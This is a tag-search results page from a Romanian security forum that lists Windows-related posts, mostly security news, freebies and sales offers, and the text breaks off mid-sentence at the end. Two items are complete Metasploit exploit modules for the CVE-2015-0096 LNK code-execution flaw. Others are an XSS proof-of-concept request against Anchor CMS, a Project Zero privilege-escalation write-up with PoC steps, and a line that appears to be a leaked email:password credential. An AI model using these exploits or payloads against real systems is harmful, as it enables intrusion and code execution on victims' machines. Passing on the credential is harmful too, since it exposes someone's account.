Jump to content

Search the Community

Showing results for tags 'windows'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

  1. juan@hotmail.com:juan Captured Keys: <------------> Renewal Date: December 24 2014 Use On: Windows OSX iOS Android
  2. A default setting in both Windows 7 and 8.1 could allow local users to elevate privileges and in some situations, escape application sandboxes. The issue, something that leaves all current Windows client installations vulnerable, lies in the way the operating system handles authentication. In some instances it could be possible for a user to use a reflection attack in NT LAN Manager, a collection of security protocols found in Windows systems, to leverage WebDAV (Web Distributed Authoring and Versioning) and carry out an attack. “It’s possible to abuse cross-protocol NTLM reflection to attack the local SMB server by forcing a local system process to access a WebDAV UNC path,” warned James Forshaw, the Google Project Zero security researcher who found the issue, on Monday. Forshaw discovered the issue last year and reported it to Microsoft’s Security Response Center on Dec. 18 but the time that Project Zero gives to vendors to fix bugs – 90 days – elapsed last week, so the Google Security Research post and its proof of concept were opened to the public. According to Microsoft however the issue doesn’t merit a fix as the company has implemented mitigations for it, like Extended Protection for Authentication, in the past. According to Forshaw’s disclosure timeline, the company informed him in January that undoing the mitigations could cause “application compatibility concerns.” When reached Wednesday a Microsoft spokesperson confirmed that users should implement EPA to avoid reflection attacks using the NTLM as a vector. “Extended Protection for Authentication (EPA) is a security feature built-in to Windows 8 and 8.1, and available for older versions of Windows via knowledge base article 2345886, that helps protect our customers against this technique. We encourage customers to follow the guidance outlined in the article to enable EPA, which is off by default as it may cause some application compatibility concerns.” As EPA doesn’t come enabled by default however, Forshaw is stressing that users looking to avoid reflection attacks follow a different set of precautions, including enabling SMB signing or enabling SMB Server SPN verification. Forshaw points out that users can also disable their Webclient service, something that would make it trickier to elevate to the local system, but that this wouldn’t prevent attacks like sandbox escapes, which require user level permissions. It also might be possible to stage the exploit in another fashion, including via a DCE/RPC call. As Forshaw acknowledges in his write-up, this is far from a new issue for Microsoft – the company actually addressed a similar issue way back in 2008 (MS08-068) that could have let attackers use NTLM to mirror authentication from one machine back to the same machines. The patch disallowed NTLM sessions in flight but failed to address cross-protocol attacks like the one Project Zero found. Source
  3. De pe vremea lui XP se banuia ca Microsoft ar colectiona date importante de la utilizatori, insa unii il banuiau mai mult ca ar fi un fel de spyware decat sa trimita date gen ai licenta sau nu si ce erori ti-au aparut. Cu windows 7/8 paranoia a inceput sa creasca si mai mult,acum si mai multi ca inainte erau siguri de convingerile lor cum ca Microsoft i-ar spiona. Cu Windows 10 nimeni nu trebuie sa mai aiba dubii in privinta asta fiindca se pare ca totul este 100% SIGUR: Nu bag mana in foc dar cica Microsoft are de gand sa iti spioneze calculatorul asa, pe fata, fara macar sa se fofileze si el. Cititi aici: If you are a privacy advocate, you should be knowing that your Windows 10 TP version use will be closely monitored by Microsoft. Well, a technical preview version is always made to do so, monitoring every system it is on to gather useful information on how to improve itself. but there are side effects of it too. With new revelation coming every day on how tech companies are monitoring you and sharing those data with law agencies or ad networks, it may not be a wise decision to go for Windows 10 TP. For more information visit preview privacy statement from Microsoft which states, “When you acquire, install and use the Programme software and services, Microsoft collects information about your use of the software and services as well as about the devices and networks on which they operate. Examples of data we may collect include your name, email address, preferences and interests; location, browsing, search and file history; phone call and SMS data; device configuration and sensor data; voice, text and writing input; and application usage.” 5 Reasons Why You should not use Microsoft's Windows 10 Technical Preview Version Postase cineva tot aici o stire cum ca in programele de baza ale hardurilor de la WDC (nu sunt sigur daca WDC sau Seagate) a fost depistat un virus foarte bine ascuns, in special in zonele pe unde au avut americanii ceva treaba cu arabii. Un astfel de virus exista pe hard fara ca tu sa fi instalat windows-ul si fara sa-l vezi in windows si fie ca pui windows sau fie ca pui linux, virusul e tot acolo si isi face treaba. Chestii de spionaj, va dati seama. Acum, se pare ca americanii prin nenea Gates vor sa ne dea niste windows nitel infectat cu programe de spionaj, la toata lumea, pe toate continentele si indiferent ca ai windows xp, vista (cine dracu' mai are vista), 7 sau 8, sa primesti GRATIS upgrade la windows 10. Misto, nu ? Si tin minte ca tot americanii l-au bagat la racoare pe un moldovean de peste Prut ca a facut nu stiu ce program trojan (stirea o gasiti postata de cineva tot pe RST). Iar ei ca ne dau ce vor ei, ei sunt liberi sa faca ce vor. A, si asta nu e tot, urmeaza cireasa de pe tort: Windows 10 (pentru PC, telefon, tableta sau ce plm vrei tu) va fi cu abonament, adica platesti lunar sau anual si ai windows, nu platesti, adio windows. Pana la urma si chiar daca nu ar avea vreun program de spionaj inclus, totul tine de $$$. Te face sa il iei pentru primul an dupa care te pune sa platesti in fiecare an. Windows 10 upgrade Will be Free for Illegal and Pirated Copies
  4. #Affected Vendor: http://anchorcms.com/ #Date: 23/03/2015 #Discovered by: JoeV #Type of vulnerability: XSS #Tested on: Windows 7 #Version: 0.9.2 #Description: Anchor CMS v 0.9.2 is susceptible to Cross Site Scripting attack. Proof of Concept (PoC): --------------------------- *XSS* --- POST /anchor/index.php/admin/pages/add HTTP/1.1 Host: localhost Proxy-Connection: keep-alive Content-Length: 1003 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://localhost User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4w4M5e7r1tBwc2wp Referer: http://localhost/anchor/index.php/admin/pages/add Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Cookie: anchor-install-timezone=-330; anchorcms-install=kIlKh79lcE6sWxZBwoSMI2eN4LuqpHgK; anchorcms-install_payload=ZDYyYjliOTEyMzhlNjJjYmVjZTg0ZmFkNmMxMGRlMDRhOjM6e3M6NDoiX291dCI7YTowOnt9czozOiJfaW4iO2E6MDp7fXM6ODoiaHRhY2Nlc3MiO3M6Mzg4OiJPcHRpb25zIC1pbmRleGVzCgo8SWZNb2R1bGUgbW9kX3Jld3JpdGUuYz4KCVJld3JpdGVFbmdpbmUgT24KCVJld3JpdGVCYXNlIC9hbmNob3IKCgkjIEFsbG93IGFueSBmaWxlcyBvciBkaXJlY3RvcmllcyB0aGF0IGV4aXN0IHRvIGJlIGRpc3BsYXllZCBkaXJlY3RseQoJUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWYKCVJld3JpdGVDb25kICV7UkVRVUVTVF9GSUxFTkFNRX0gIS1kCgoJIyBSZXdyaXRlIGFsbCBvdGhlciBVUkxzIHRvIGluZGV4LnBocC9VUkwKCVJld3JpdGVSdWxlIF4oLiopJCBpbmRleC5waHAvJDEgW0xdCjwvSWZNb2R1bGU%2BCgo8SWZNb2R1bGUgIW1vZF9yZXdyaXRlLmM%2BCglFcnJvckRvY3VtZW50IDQwNCBpbmRleC5waHAKPC9JZk1vZHVsZT4KIjt9; anchorcms=u8h0s9Vjh9LUAM56y7TDWBFolw8tJxxC ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="token" 286db1269c0e304c7e435bf10251f950 ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="title" <img src="blah.jpg" onerror="alert('XSS')"/> ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="redirect" ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="content" <img src="blah.jpg" onerror="alert('XSS')"/> ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="name" <img src="blah.jpg" onerror="alert('XSS')"/> ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="slug" <img src="blah.jpg" onerror="alert('XSS')"/> ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="status" published ------WebKitFormBoundary4w4M5e7r1tBwc2wp Content-Disposition: form-data; name="parent" 1 ------WebKitFormBoundary4w4M5e7r1tBwc2wp-- -- Regards, *Joel V* Source
  5. Aerosol

    kcsoftwares

    Windows free useful tools. Check it: KC Softwares
  6. Have you ever been on a pentest, or troubleshooting a customer issue, and the "next step" was to capture packets on a Windows host? Then you find that installing winpcap or wireshark was simply out of scope or otherwise not allowed on that SQL, Exchange, Oracle or other host? It used to be that this is when we'd recommend installing Microsoft's Netmon packet capture utility, but even then lots of IT managers would hesitate about using the "install" word in association with a critical server. Well, as they say in networking (and security as well), there's always another way, and this is that way. "netsh trace" is your friend. And yes, it does exactly what it sounds like it does. Type "netsh trace help" on any Windows 7 Windows Server 2008 or newer box, and you'll see the following: C:\>netsh trace help The following commands are available: Commands in this context: ? - Displays a list of commands. convert - Converts a trace file to an HTML report. correlate - Normalizes or filters a trace file to a new output file. diagnose - Start a diagnose session. dump - Displays a configuration script. help - Displays a list of commands. show - List interfaces, providers and tracing state. start - Starts tracing. stop - Stops tracing. Of course, in most cases, tracing everything on any production box is not advisable - especially if it's your main Exchange, SQL or Oracle server. We'll need to filter the capture, usually to a specific host IP, protocol or similar. You can see more on this here: netsh trace show capturefilterhelp One of the examples in this output shows you how t o e.g. 'netsh trace start capture=yes Ethernet.Type=IPv4 IPv4.Address=157.59.136.1' You could also add Protocol=TCP or UDP and so on.. Full syntax and notes for netsh trace can be found here: https://technet.microsoft.com/en-us/library/dd878517 For instance, the following session shows me capturing an issue with a firewall that I'm working on. Note that you need admin rights to run this, the same as any capture tool. In a pentest you would likely specify an output file that isn't in the users' directory. C:\>netsh trace start capture=yes IPv4.Address=192.168.122.2 Trace configuration: ------------------------------------------------------------------- Status: Running Trace File: C:\Users\Administrator\AppData\Local\Temp\NetTraces\NetTrace .etl Append: Off Circular: On Max Size: 250 MB Report: Off When you are done capturing data, it's time to stop it: C:\> netsh trace stop Correlating traces ... done Generating data collection ... done The trace file and additional troubleshooting information have been compiled as "C:\Users\Administrator\AppData\Local\Temp\NetTraces\NetTrace.cab". File location = C:\Users\Administrator\AppData\Local\Temp\NetTraces\NetTrace.etl Tracing session was successfully stopped. c:\ The cool thing about this is that it doesn't need a terminal session (with a GUI, cursor keys and so on). If all you have is a metasploit shell, netsh trace works great! If this is a capture for standard sysadmin work, you can simply copy the capture over to your workstation and proceed on with analysis. If this is a pentest, a standard copy might still work (remember, we're on a Microsoft server), but if you need netcat type function to exfiltrate your capture, take a look at PowerCat (which is a netcat port in PowerShell). Next, open the file (which is in Microsoft's ETL format) in Microsoft's Message Analyzer app - which you can install on your workstation rather than the server we ran the capture on ( Download Microsoft Message Analyzer from Official Microsoft Download Center ). Message Analyzer has a surprisingly nice interface and some decent packet parsing, you might be able to wrap up your analysis just in this tool (see below). If you do need another packet analysis tool, it's easy to a File / Save As / Export, and save as a PCAP file that Wireshark, tcpdump, SNORT, ngrep, standard python or perl calls, or any other standard tool can read natively. Or you can convert to PCAP using PowerShell (of course you can). A short, simple script to do this might look like: $s = New-PefTraceSession -Path “C:\output\path\spec\OutFile.Cap” -SaveOnStop $s | Add-PefMessageProvider -Provider “C:\input\path\spec\Input.etl” $s | Start-PefTraceSession This Powershell cmdlet is not available in Windows 7 - you'll need Windows 8, or Server 2008 or newer (This script was found at So you want to use Wireshark to read the netsh trace output .etl? - The troubleshooters and problem solvers... - Site Home - TechNet Blogs ) If 'netsh trace' has solved an interesting problem for you, or was the tool that got you some interesting data in a pentest, please, use our comment form to let us know how you used it (within your NDA of course!) ====================== - some extra information to prevent confusion: on Windows 7, the NETSH TRACE command is only available on the 64-bit version of NETSH so in case it tells you the TRACE command is not available then just make sure to run the 64-bit version... c:\>netsh trace The following command was not found: trace. c:\>run -l netsh 1) CHOSEN: netsh.exe [C:\Windows\SysWOW64] 2) netsh.exe [C:\Windows\winsxs\amd64_microsoft-windows-netsh_31bf3856ad364e35_6.1.7600.16385_none_bb95e7e51189d8f9] 3) windows - What appid should I use with netsh.exe- - Stack Overflow.url [F:\AWS\Sec] c:\>run -1 netsh trace Running: C:\Windows\SysWOW64\netsh.exe: The following command was not found: trace. c:\>run -2 netsh trace Running: C:\Windows\winsxs\amd64_microsoft-windows-netsh_31bf3856ad364e35_6.1.7600.16385_none_bb95e7e51189d8f9\netsh.exe: ? - convert - Converts a trace file to an HTML report. correlate - Normalizes or filters a trace file to a new output file. diagnose - Start a diagnose session. dump - help - show - List interfaces, providers and tracing state. start - Starts tracing. stop - Stops tracing. Source: HERE
  7. Cumpar rds windows LEGALE , nu scanate , nu furate
  8. Source: https://code.google.com/p/google-security-research/issues/detail?id=222 Windows: Local WebDAV NTLM Reflection Elevation of Privilege Platform: Windows 8.1 Update, Windows 7 Class: Elevation of Privilege Summary: A default installation of Windows 7/8 can be made to perform a NTLM reflection attack through WebDAV which allows a local user to elevate privileges to local system. Description: NTLM reflection is a well known issue with Windows authentication. It’s typically abused in networked scenarios to reflect credentials from one machine to another. It used to be possible to reflect credentials back to the same machine but that was mitigated in MS08-068 by not honouring NTLM authentication sessions already in flight. However this did nothing to stop cross-protocol attacks. The WebClient service for WebDAV (which is installed and enabled by default, although you’d need to start it using its service trigger) also does NTLM authentication if the server requests it. As Windows has no block on binding to TCP ports < 1024 from a normal user account then we can setup our own WebDAV server running as a normal user bound to localhost (so also no firewall issues). If we can convince another user, ideally local system to connect to the WebDAV server we can start an NTLM authentication session. This can then be replayed locally to the TCP/IP CIFS service endpoint to authenticate as that user. If this was a local system account then that gives you full local admin privs, you can read/write any file on the system through the admin shares. You could also bind to local named pipes such as the service manager and create a new privileged service. I’d put money on there being many ways of getting local system to open an arbitrary file, but the easiest one to exploit is Windows Defender (at least on Windows 8.1). You can tell it to initiate a scan of a file which gets opened under the local system token. Of course this might be a bug in and of itself. No processing of the path is done, it seems to be passed directly to CreateFile. This will cause a webdav connection to start to localhost and then NTLM can be negotiated. I don’t believe I’ve changed the settings on my VMs which would enable this attack. Certainly reading Group Policy settings it seems like localsystem shouldn’t authenticate with the machine account by default, but it seems that you can. I’ve checked my security settings and they look correct. I’ve tested it on Windows 8.1 Update with defender, and on Windows 7 manually executing the open as local system and they both work. After a quick search I can’t find anyone documenting this for the purposes of local privilege escalation attacks although it’s perhaps an obvious way of abusing the functionality so I would expect this is not common knowledge. It is the sort of bug which could be being exploited in the wild considering all it needs is socket access (which is any user) and some way of convincing a privileged user to open the local webdav share. Of course no-doubt it can be effectively mitigated using SMB signing although it isn’t clear that the NTLM extended protection is doing anything to stop it. That said this works in a default installation even with file sharing effectively disabled (at least as far as the GUIs will allow). Even with signing enabled on the client I guess it’s possible that you can reflect the NTLM credentials to a local TCP DCE/RPC endpoint instead to achieve a similar effect. Also I wouldn’t be so sure that WebDAV is the only way of doing this. Again another one might be COM marshaling and specifying a endpoint locally (although it might be clever enough to not directly communicate for that one). Another use for this attack is for negotiating a local impersonation token for local system which could be used for Token Kidnapping purposes. Calling AcceptSecurityContext from any account with permissions to handle enterprise auth will be handed back an impersonation level token, even normal users. But of course network service etc would have most use for the token. Proof of Concept: I’ve provided a PoC which causes the Windows Defender service to open a WebDAV connection as Local System. This is for Windows 8.1 only as Windows 7’s defender doesn’t support the command as far as I know. The credentials are reflected to the local SMB service to write the file dummy.txt to the root of the C: drive. Of course more dangerous things could be done at this point. The PoC is written in Java just because it was the easiest to modify it’s library. No doubt an existing relay application could be repurposed, for example SmbRelay3 is supposed to be able to relay HTTP to SMB auth, but I didn’t try that. 1) Install latest Java 8 JRE. 2) Start the WebClient service, this could be done in many ways from a normal user, for now just start it using the service manager. 3) Extract the PoC to a directory. 4) Run “java -jar SmbTest.jar” in the extracted directory. This binds the WebDAV server then starts a scan with defender, after some seconds the exploit should run (there’s some slowness in everything starting). Repro Notes: If the PoC prints that the WebClient service isn’t started then start it. If no HTTP/NTLM traffic is printed to the console then webdav/mup had marked the server as down. Restart the webclient service and it should fix it. Expected Result: It shouldn’t be possible to elevate privileges, the SMB connection should fail to authenticate Observed Result: Authentication was successful as local system and a file written to the root of the C drive . Proof of Concept: http://www.exploit-db.com/sploits/36424.zip Source
  9. Does downloading Windows updates from Microsoft's servers and waiting too long really annoy you? It might not be with the arrival of Windows 10. Microsoft seems to make a major change in Windows 10 to the way it delivers updates for the software. The leaked version of Windows 10 build 10036 (the current version is build 9926) allows you to grab OS updates from Microsoft as well as other computers, whether they're on your local network or on the Internet. Yeah, it's a Peer-to-Peer (P2P) technology Microsoft is going to use in order to deliver both app and operating system updates. Peer-to-Peer, or P2P Technology is usually associated with file sharing services like BitTorrent to download illicit copies of movies and albums, and of course, those endless Linux ISOs you've been downloading. However, Redmond is embracing the technology as an efficient means to deliver software updates to its users around the globe. Peer-to-Peer downloads will be optional in Windows 10. The new dialog box titled "Choose how you download updates" offers Windows users an option to "Download apps and OS updates from multiple sources to get them more quickly". Once turned ON, the option delivers you choices to Download apps and OS updates from Microsoft and PCs on my local network Download apps and OS updates from Microsoft, PCs on my local network, and PCs on the Internet Besides accelerating the upgrade process, P2P feature could save precious bandwidth if you have a multiple PCs in your house. Redmond's move is not at all surprising, as the software maker bought Pando Networks in 2013, which is the maker of a peer-to-peer file sharing technology, similar to BitTorrent. So far, the leaked screenshot is not confirmed by the company neither it released any official announcement, but you can expect the new release of an official Windows 10 preview shortly that will likely include the new changes. However, if Microsoft really includes P2P technology for updating its software, it will be an interesting option for enabling distributed updates, rather than updating through Windows Server Update Services. Home users might appreciate the faster downloads that will come with peer-to-peer downloads. Source
  10. Free Windows Hosting for 60 Days myWindowsHosting.com - Unlimited Windows Hosting
  11. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::EXE attr_accessor :dll_base_name attr_accessor :exploit_dll_base_name def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Windows Shell LNK Code Execution', 'Description' => %q{ This module exploits a vulnerability in the MS10-046 patch to abuse (again) the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This module creates the required files to exploit the vulnerability. They must be uploaded to an UNC path accessible by the target. This module has been tested successfully on Windows 2003 SP2 with MS10-046 installed and Windows 2008 SP2 (32 bits) with MS14-027 installed. }, 'Author' => [ 'Michael Heerklotz', # Vulnerability discovery 'juan vazquez' # msf module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2015-0096'], ['MSB', 'MS15-020'], ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBOymTF9so'], ['URL', 'https://github.com/rapid7/metasploit-framework/pull/4911'] # How to guide here ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 2048, }, 'Platform' => 'win', 'Targets' => [ ['Automatic', { }] ], 'DisclosureDate' => 'Mar 10 2015', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [true, 'The LNK file', 'msf.lnk']), OptString.new('UNCHOST', [true, 'The host portion of the UNC path to provide to clients (ex: 1.2.3.4).']), OptString.new('UNCSHARE', [true, 'The share folder portion of the UNC path to provide to clients (ex: share).']), ], self.class) end def smb_host "\\\\#{datastore['UNCHOST']}\\#{datastore['UNCSHARE']}\\" end def exploit_dll_filename name_length = 257 - (smb_host.length + 4 + 2) self.dll_base_name = dll_base_name || rand_text_alpha(1) self.exploit_dll_base_name = exploit_dll_base_name || rand_text_alpha(name_length) "#{dll_base_name} #{exploit_dll_base_name}.dll" end def dll_filename self.dll_base_name = dll_base_name || rand_text_alpha(1) "#{dll_base_name}.dll" end def create_exploit_file(file_name, data) unless ::File.directory?(Msf::Config.local_directory) FileUtils.mkdir_p(Msf::Config.local_directory) end path = File.join(Msf::Config.local_directory, file_name) full_path = ::File.expand_path(path) File.open(full_path, 'wb') { |fd| fd.write(data) } full_path end def dll_create(data) full_path = create_exploit_file(dll_filename, data) print_good "DLL with payload stored at #{full_path}" end def exploit_dll_create(data) full_path = create_exploit_file(exploit_dll_filename, data) print_good "Fake dll to exploit stored at #{full_path}" end def exploit dll = generate_payload_dll dll_create(dll) exploit_dll_create(dll) lnk = generate_link("#{smb_host}#{exploit_dll_filename}") file_create(lnk) end # stolen from ms10_046_shortcut_icon_dllloader, all the credits to the original authors: 'hdm', 'jduck', 'B_H' def generate_link(unc) uni_unc = unc.unpack('C*').pack('v*') path = '' path << [ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 ].pack('C*') path << uni_unc # LinkHeader ret = [ 0x4c, 0x00, 0x00, 0x00, 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 ].pack('C*') idlist_data = '' idlist_data << [0x12 + 2].pack('v') idlist_data << [ 0x1f, 0x00, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30, 0x30, 0x9d ].pack('C*') idlist_data << [0x12 + 2].pack('v') idlist_data << [ 0x2e, 0x1e, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30, 0x30, 0x9d ].pack('C*') idlist_data << [path.length + 2].pack('v') idlist_data << path idlist_data << [0x00].pack('v') # TERMINAL WOO # LinkTargetIDList ret << [idlist_data.length].pack('v') # IDListSize ret << idlist_data # ExtraData blocks (none) ret << [rand(4)].pack('V') # Patch in the LinkFlags ret[0x14, 4] = ['10000001000000000000000000000000'.to_i(2)].pack('N') ret end end Source
  12. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::EXE include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::SMB::Server::Share attr_accessor :exploit_dll_name def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Windows Shell LNK Code Execution', 'Description' => %q{ This module exploits a vulnerability in the MS10-046 patch to abuse (again) the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This creates an SMB resource to provide the payload and the trigger, and generates a LNK file which must be sent to the target. This module has been tested successfully on Windows 2003 SP2 with MS10-046 installed and Windows 2008 SP2 (32 bits) with MS14-027 installed. }, 'Author' => [ 'Michael Heerklotz', # Vulnerability discovery 'juan vazquez' # msf module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2015-0096'], ['MSB', 'MS15-020'], ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBOymTF9so'], ['URL', 'https://github.com/rapid7/metasploit-framework/pull/4911'] # How to guide here ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 2048, }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', { } ] ], 'DisclosureDate' => 'Mar 10 2015', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [true, 'The LNK file', 'msf.lnk']) ], self.class) register_advanced_options( [ OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', false]) ], self.class) deregister_options('FILE_CONTENTS', 'FILE_NAME') end def smb_host "\\\\#{srvhost}\\#{share}\\" end def setup super self.file_contents = generate_payload_dll random_char = rand_text_alpha(1) self.file_name = "#{random_char}.dll" prefix = "#{random_char} " random_length = 257 - smb_host.length - file_name.length - prefix.length self.exploit_dll_name = "#{prefix}#{rand_text_alpha(random_length)}#{file_name}" print_status("Payload available on #{unc}...") print_status("Trigger available on #{smb_host}#{exploit_dll_name}...") end def primer lnk = generate_link("#{smb_host}#{exploit_dll_name}") file_create(lnk) print_status('The LNK file must be sent or shared with the target...') end def generate_link(unc) uni_unc = unc.unpack('C*').pack('v*') path = '' path << [ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 ].pack('C*') path << uni_unc # LinkHeader ret = [ 0x4c, 0x00, 0x00, 0x00, 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 ].pack('C*') idlist_data = '' idlist_data << [0x12 + 2].pack('v') idlist_data << [ 0x1f, 0x00, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30, 0x30, 0x9d ].pack('C*') idlist_data << [0x12 + 2].pack('v') idlist_data << [ 0x2e, 0x1e, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30, 0x30, 0x9d ].pack('C*') idlist_data << [path.length + 2].pack('v') idlist_data << path idlist_data << [0x00].pack('v') # TERMINAL WOO # LinkTargetIDList ret << [idlist_data.length].pack('v') # IDListSize ret << idlist_data # ExtraData blocks (none) ret << [rand(4)].pack('V') # Patch in the LinkFlags ret[0x14, 4] = ['10000001000000000000000000000000'.to_i(2)].pack('N') ret end end Source
  13. Specs: - 15 GB RAM - 100 GB HDD - 1 Gbit/s network - NVIDIA GRID GPU - 12 CPU Cores - Windows OS PS: Trebuie s? verificati cu num?rul de telefon. https://trial.gimli.nvidiagrid.net/accounts/register/
  14. Microsoft OneNote needs no introduction — it is feature-filled and highly coveted digital notetaking app by Microsoft that works on and syncs with all your devices: Windows, Mac, iPhone, iPad, Android, online (via any modern web browser), and Windows Phone. Previously, Microsoft OneNote was available for purchase as a standalone program. Then it was bundled with Microsoft Office. Later, OneNote was made a freemium app; some features available for free while others you had to pay for. Now, however, all features of Microsoft OneNote are available for free — forever, for everyone, and on all platforms. Get it now! Link: Free Microsoft OneNote (100% discount)
  15. WINner Tweak 3 Pro is an all-in-one suite that allows for tweaking, optimizing and tuning of Windows; it includes over ten tools, hundreds of tweaks, settings, and optimizations and you can browse the five main sections of the Tune-Up Center — Windows, Hardware, Security, Network and Software — to get access to the needed tweak or setting. Try it now. Link: Free WINner Tweak 3 Pro (100% discount)
  16. Microsoft today issued an advisory warning Windows users that Secure Channel, or Schannel, the Windows implementation of SSL/TLS, is vulnerable to the FREAK attack. Disclosed this week, FREAK (CVE-2015-1637) is the latest big Internet bug. It affects a number of SSL clients, including OpenSSL, and enables attackers to force clients to downgrade to weakened ciphers that can be broken and then supposedly encrypted traffic can be sniffed via man-in-the-middle attacks. Microsoft warned that Schannel is not immune to FREAK exploits, though it said it has not received any reports of public attacks. Windows users can expect either a security bulletin released on a regularly scheduled Patch Tuesday update, or an out-of-band patch. Microsoft said that Windows servers are not impacted if in their default configuration, in which export ciphers such as the RSA cipher in question with FREAK are disabled. Microsoft suggested a few workarounds that include disabling RSA key exchange ciphers via the registry for Windows Server 2003 systems. For later versions of Windows, Microsoft said RSA key exchange ciphers may be disabled using Group Policy Object Editor. The export ciphers are a remnant of the crypto wars of the 1980s and 1990s; SSL clients will accept the weaker RSA keys without asking for them. The RSA keys in question are 512-bit and were approved by the U.S. government for overseas export and it was assumed that most servers no longer supported them. “The export-grade RSA ciphers are the remains of a 1980s-vintage effort to weaken cryptography so that 